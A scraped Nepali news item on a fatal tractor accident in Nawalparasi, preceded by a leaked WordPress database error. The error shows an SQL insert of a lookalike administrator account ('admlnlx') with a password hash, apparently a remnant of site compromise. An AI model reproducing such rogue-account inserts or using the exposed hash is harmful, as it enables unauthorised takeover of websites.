WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BoTDfwdvVTmZnQDTMjmtycacSy7BU./', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 05:17:29', '', 'admlnlx', 'admlnlx')
ज्ञानु पंगेनी
नवलपरासी माघ , २-
नवलपरासी आज (आइतवार) भएको ट्याक्टर दुर्घटनामा दुइ जनाको ज्यान गएको छ ।
नयाँ वेलहानी गाविस ८ अरुणखोलाको जंगलमा पश्चिमतर्फ जादै गरेको लु ३ त २६९९ नम्बरको ट्याक्टर अनियन्त्रित भई पल्टिएको हो ।दुर्घटनामा परि मृत्यु हुनेमा दुम्किवास ७ का २६ वर्षिय चेत वहादुर रेश्मीमगर र दुम्किवास १ का २७ वर्षीय शम्भु गुरुङ्ग रहेका छन् ।
ट्याक्टरका चालक फरार रहेको र खोजी भैरहेको ईलाका प्रहरी कार्यालय नवलपुरका डिएसपी राजेश थापाले वताउनु भयो ।ट्याक्टर तिव्र गतिमा भएकाले अनियन्त्रीत भई दुर्घटना भएको प्रहरीको अनुमान छ ।